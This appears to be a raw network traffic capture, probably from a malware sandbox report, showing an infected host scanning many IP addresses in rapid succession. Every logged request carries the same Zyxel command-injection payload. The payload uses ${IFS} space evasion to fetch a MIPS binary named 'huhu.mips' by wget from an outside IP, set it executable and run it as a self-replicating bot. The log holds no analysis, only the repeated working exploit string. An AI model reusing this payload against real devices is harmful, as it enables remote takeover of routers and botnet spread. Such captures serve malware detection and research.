                                                  Jan 19, 2024 18:24:12.376841068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8405192.168.2.134484612.251.36.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376872063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8406192.168.2.135781471.178.90.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376913071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8407192.168.2.13542608.111.115.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.376967907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8408192.168.2.1344072167.59.78.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377006054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8409192.168.2.133896285.143.1.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377048016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8410192.168.2.135410665.225.255.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377085924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8411192.168.2.1345482203.91.131.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377131939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8412192.168.2.1339036118.76.147.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377166986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8413192.168.2.1337594158.46.137.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377206087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8414192.168.2.1350486156.73.39.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377279043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8415192.168.2.1338840158.53.42.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377309084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8416192.168.2.1339906149.120.107.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377341986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8417192.168.2.1351660117.131.247.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377378941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8418192.168.2.135336817.77.7.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377409935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8419192.168.2.1358848190.129.210.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377460957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8420192.168.2.1350448130.243.223.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377502918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8421192.168.2.1343218175.101.98.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377548933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8422192.168.2.134098449.201.226.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377614975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8423192.168.2.1357968147.68.172.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377644062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8424192.168.2.135585827.22.162.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377684116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8425192.168.2.1360896207.102.212.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377744913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8426192.168.2.1353164218.221.207.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377774000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8427192.168.2.134706044.20.24.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377794981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8428192.168.2.1336304133.126.118.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377815962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8429192.168.2.1351810155.138.57.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377860069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8430192.168.2.1344006155.138.129.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377898932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8431192.168.2.1354238150.26.33.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377971888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8432192.168.2.1339914166.217.139.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.377984047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8433192.168.2.135760025.85.160.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378041029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8434192.168.2.1345690206.114.212.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378073931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8435192.168.2.134836485.190.183.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378134012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8436192.168.2.1357252144.206.0.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378163099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8437192.168.2.135484697.59.149.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378215075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8438192.168.2.1355220131.219.218.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378281116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8439192.168.2.1341868123.133.174.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378310919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8440192.168.2.1332772139.190.233.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378339052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8441192.168.2.1350058184.178.62.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378384113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8442192.168.2.1333466134.83.98.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378408909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8443192.168.2.1348416186.207.61.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378434896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8444192.168.2.1352814181.34.91.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378468037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8445192.168.2.135277475.130.98.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378510952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8446192.168.2.133751299.252.19.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378549099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8447192.168.2.1334742208.39.107.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378572941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8448192.168.2.1359744154.12.80.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378618956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8449192.168.2.1342630199.204.146.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378667116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8450192.168.2.1355470211.227.26.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378714085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8451192.168.2.1358650221.207.198.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378732920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8452192.168.2.1341462178.213.233.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378807068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8453192.168.2.13596568.152.84.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378855944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8454192.168.2.134835612.243.114.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378879070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8455192.168.2.1358742182.30.34.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378921986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8456192.168.2.134959658.25.178.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.378959894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8457192.168.2.1354538136.96.83.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379004955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8458192.168.2.1345474179.251.98.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379012108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8459192.168.2.1352014202.215.64.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379074097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8460192.168.2.1343846167.69.67.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379091024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8461192.168.2.1338656162.144.96.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379153967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8462192.168.2.134850419.65.32.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379193068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8463192.168.2.134216079.215.79.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379261017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8464192.168.2.135273278.41.163.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379298925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8465192.168.2.1360536202.73.215.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379333973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8466192.168.2.1344052222.45.125.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:12.379380941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8467192.168.2.1336910139.101.76.120443
                                                  TimestampBytes transferredDirectionData
